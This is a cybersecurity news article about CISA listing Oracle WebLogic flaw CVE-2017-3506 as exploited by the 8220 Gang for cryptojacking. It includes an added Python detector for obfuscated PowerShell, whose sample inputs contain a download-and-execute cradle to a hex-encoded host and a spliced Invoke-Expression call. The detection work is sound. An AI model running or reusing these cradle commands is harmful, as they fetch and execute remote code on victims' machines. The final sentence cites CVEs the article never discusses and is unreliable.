
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw affecting Oracle WebLogic Server to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2017-3506 (CVSS score: 7.4), the issue concerns an operating system (OS) command injection vulnerability that could be exploited to gain unauthorized access to susceptible servers and take complete control of them.
"Oracle WebLogic Server, a product within the Fusion Middleware suite, contains an OS command injection vulnerability that allows an attacker to execute arbitrary code via a specially crafted HTTP request that includes a malicious XML document," CISA said.

While the agency did not disclose the nature of the attacks exploiting the vulnerability, the China-based cryptojacking group known as the 8220 Gang (aka Water Sigbin) has a history of leveraging it since early last year to co-opt unpatched devices into a crypto-mining botnet.
According to a recent report published by Trend Micro, the 8220 Gang has been observed weaponizing flaws in Oracle WebLogic Server (CVE-2017-3506 and CVE-2023-21839) to launch a cryptocurrency miner filelessly in memory by means of a shell or PowerShell script, depending on the operating system targeted.

"The group employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery," security researcher Sunil Bharti said. "The PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components."
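As an added example (this is not code from the Trend Micro report, and not the group's own tooling), the following Python heuristics flag, in process command lines, the three obfuscation patterns named above: URLs hidden as hexadecimal byte escapes, cleartext HTTP pointed at port 443, and strings spliced together from PowerShell environment variables. The command lines in SAMPLES are constructed for illustration and do not reproduce any real payload; the indicator weights and the threshold are assumptions chosen here, not values from the report.

```python
"""Heuristic indicators for the obfuscation patterns described in the article.

Added example; not code from Trend Micro or the 8220 Gang. Sample command
lines are constructed, and the weights/threshold are this example's own choice.
"""
import re
from typing import Dict, List

# Four or more consecutive \xNN escapes, the form a hex-encoded URL takes in a script
HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}){4,}')
# Plain http:// aimed at port 443: cleartext traffic that blends with TLS on the wire
HTTP_ON_443 = re.compile(r'http://[^\s/:"\']+:443(?=[/\s"\']|$)', re.IGNORECASE)
# PowerShell environment-variable references ($env:NAME)
PS_ENV = re.compile(r'\$env:[A-Za-z_]\w*', re.IGNORECASE)
# Two $env: values concatenated with '+' is the string-splicing pattern
ENV_SPLICE = re.compile(r'\$env:\w+\s*\+\s*\$env:\w+', re.IGNORECASE)
# Common download-and-execute cradle keywords
CRADLE = re.compile(
    r'(?:\bIEX\b|Invoke-Expression|DownloadString|Invoke-WebRequest|\bcurl\b|\bwget\b)',
    re.IGNORECASE,
)

# Assumed weights: encoding tricks count for more than a bare cradle keyword,
# so an admin's plain "curl https://..." alone does not trip the detector.
WEIGHTS = {
    'hex_encoded_url': 2,
    'http_over_443': 1,
    'env_var_splicing': 2,
    'download_cradle': 1,
}


def decode_hex_runs(text: str) -> List[str]:
    """Decode every \\xNN run in text to a string (latin-1 keeps all byte values)."""
    decoded = []
    for m in HEX_RUN.finditer(text):
        raw = bytes.fromhex(m.group(0).replace('\\x', ''))
        decoded.append(raw.decode('latin-1'))
    return decoded


def analyze(cmdline: str) -> Dict[str, object]:
    """Return the indicators that fire on one command line."""
    hits: Dict[str, object] = {}
    decoded = decode_hex_runs(cmdline)
    urls = [d for d in decoded if re.search(r'https?://', d, re.IGNORECASE)]
    if urls:
        hits['hex_encoded_url'] = urls
    # Check the decoded text too, so a hex-hidden "http://host:443" is also caught
    if HTTP_ON_443.search(cmdline) or any(HTTP_ON_443.search(d) for d in decoded):
        hits['http_over_443'] = True
    env_refs = PS_ENV.findall(cmdline)
    if len(env_refs) >= 2 and ENV_SPLICE.search(cmdline):
        hits['env_var_splicing'] = env_refs
    if CRADLE.search(cmdline):
        hits['download_cradle'] = True
    return hits


def score(cmdline: str) -> int:
    """Weighted sum of the indicators that fired."""
    return sum(WEIGHTS[name] for name in analyze(cmdline))


def is_suspicious(cmdline: str, threshold: int = 2) -> bool:
    return score(cmdline) >= threshold


# Constructed samples (not real 8220 Gang artifacts).
SAMPLES = [
    # hex-hidden URL that decodes to http://10.0.0.5:443/a, fed to a download cradle
    r'powershell -c "$u=\"\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x35'
    r'\x3a\x34\x34\x33\x2f\x61\"; IEX (New-Object Net.WebClient).DownloadString($u)"',
    # the cmdlet name is split across environment variables and re-joined at run time
    r'powershell -c "$env:A=\"Inv\"; $env:B=\"oke-Expression\"; & ($env:A+$env:B) $env:C"',
    # benign administrative command
    'powershell -c "Get-Service | Where-Object Status -eq Running"',
]

if __name__ == '__main__':
    for s in SAMPLES:
        print(is_suspicious(s), analyze(s))
```

The decoding step matters: a plain string match for "http://" or ":443" would miss the first sample entirely, because the URL only exists once the escapes are reassembled. The splicing check deliberately requires both multiple references and a "+" between them, since scripts that merely read one environment variable are routine.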
In light of the active exploitation of CVE-2024-1086 and CVE-2024-24919, federal agencies are recommended to apply the latest fixes by June 24, 2024, to protect their networks against potential threats.